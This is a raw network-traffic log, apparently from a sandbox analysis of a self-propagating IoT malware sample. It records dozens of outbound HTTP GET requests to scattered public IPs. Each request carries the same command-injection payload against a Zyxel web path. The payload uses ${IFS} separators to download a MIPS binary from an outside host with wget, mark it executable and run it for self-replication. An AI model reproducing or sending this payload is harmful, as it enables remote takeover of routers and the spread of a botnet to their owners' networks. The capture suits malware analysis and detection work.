                                                Jan 28, 2024 10:16:32.924474955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6334192.168.2.235625259.211.109.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924524069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6335192.168.2.2339712108.40.99.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924554110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6336192.168.2.2343904203.73.181.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924582958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6337192.168.2.233487299.95.26.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924583912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6338192.168.2.2354052126.220.183.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924608946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6339192.168.2.235638889.131.8.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924629927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6340192.168.2.2356728100.147.17.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924663067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6341192.168.2.233627047.78.121.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924705982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6342192.168.2.235616071.19.135.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924711943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6343192.168.2.2358216196.133.211.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924747944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6344192.168.2.23547401.126.200.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924784899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6345192.168.2.233637288.44.34.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924810886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6346192.168.2.2348166113.9.84.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924860954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6347192.168.2.2355356133.123.254.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924882889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6348192.168.2.2334922134.99.29.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924902916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6349192.168.2.2342472116.29.232.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924926043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6350192.168.2.236036284.204.21.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924951077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6351192.168.2.235794234.144.247.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924953938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6352192.168.2.2351198141.91.139.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.924989939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6353192.168.2.2346448181.48.179.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925021887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6354192.168.2.234022094.228.55.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925040960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6355192.168.2.234406020.32.228.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925076008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6356192.168.2.2344946202.184.178.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925076008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6357192.168.2.2350318136.125.177.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925077915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6358192.168.2.233446644.51.53.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925138950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6359192.168.2.2350564114.100.11.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925163984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6360192.168.2.2357804154.170.16.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925189018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6361192.168.2.2348048146.1.89.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925232887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6362192.168.2.2342500223.1.13.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925254107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6363192.168.2.2338480165.61.220.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925288916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6364192.168.2.2339448217.15.177.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925319910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6365192.168.2.2350890101.197.69.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925333023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6366192.168.2.2357972159.223.245.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925371885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6367192.168.2.235446458.21.59.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925405025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6368192.168.2.2341174174.199.152.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925457001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6369192.168.2.2342554174.219.66.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925458908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6370192.168.2.2336562139.98.52.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925486088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6371192.168.2.2355954213.59.147.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925527096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6372192.168.2.234882274.172.4.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925558090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6373192.168.2.234447425.100.157.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925601006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6374192.168.2.2341568118.133.223.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925610065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6375192.168.2.2340528221.71.197.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925640106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6376192.168.2.2342788106.65.247.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925663948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6377192.168.2.235218284.67.22.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925663948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6378192.168.2.235599219.118.92.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925700903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6379192.168.2.2333736196.234.91.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925724983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6380192.168.2.2350696199.168.153.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925765038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6381192.168.2.234275877.169.51.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925793886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6382192.168.2.2335020113.164.14.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925808907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6383192.168.2.2352880212.13.74.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925827026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6384192.168.2.235256664.198.131.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925862074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6385192.168.2.235763880.67.231.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925893068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6386192.168.2.2344200136.49.159.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925915956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6387192.168.2.2338012221.158.78.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925929070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6388192.168.2.235472039.99.53.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925957918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6389192.168.2.234681839.162.1.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.925961971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6390192.168.2.2355558156.222.239.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926009893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6391192.168.2.2336808131.151.189.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926031113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6392192.168.2.235485658.3.186.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926053047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6393192.168.2.234263641.244.84.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926084042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6394192.168.2.233884054.241.166.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926105022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6395192.168.2.2349886211.3.56.248443
                                                TimestampBytes transferredDirectionData
